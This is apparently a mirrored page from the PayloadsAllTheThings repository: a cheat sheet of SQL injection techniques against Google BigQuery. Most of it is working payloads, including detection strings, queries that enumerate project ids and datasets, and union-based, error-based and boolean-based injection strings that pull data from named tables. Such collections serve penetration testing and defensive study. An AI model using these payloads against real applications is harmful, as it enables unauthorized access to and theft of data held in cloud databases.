mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
3.4 KiB
3.4 KiB
Google BigQuery SQL Injection
Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
Summary
- Detection
- BigQuery Comment
- BigQuery Union Based
- BigQuery Error Based
- BigQuery Boolean Based
- BigQuery Time Based
- References
Detection
- Use a classic single quote to trigger an error:
'
- Identify BigQuery using backtick notation:
SELECT .... FROM `` AS ...
SQL Query | Description |
---|---|
SELECT @@project_id |
Gathering project id |
SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA |
Gathering all dataset names |
select * from project_id.dataset_name.table_name |
Gathering data from specific project id & dataset |
BigQuery Comment
Type | Description |
---|---|
# |
Hash comment |
/* PostgreSQL Comment */ |
C-style comment |
BigQuery Union Based
UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
BigQuery Error Based
SQL Query | Description |
---|---|
' OR if(1/(length((select('a')))-1)=1,true,false) OR ' |
Division by zero |
select CAST(@@project_id AS INT64) |
Casting |
BigQuery Boolean Based
' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
BigQuery Time Based
- Time based functions does not exist in the BigQuery syntax.
References
- BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022
- BigQuery Documentation - Query Syntax - October 30, 2024
- BigQuery Documentation - Functions and Operators - October 30, 2024
- Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - Duc Nguyen - March 31, 2020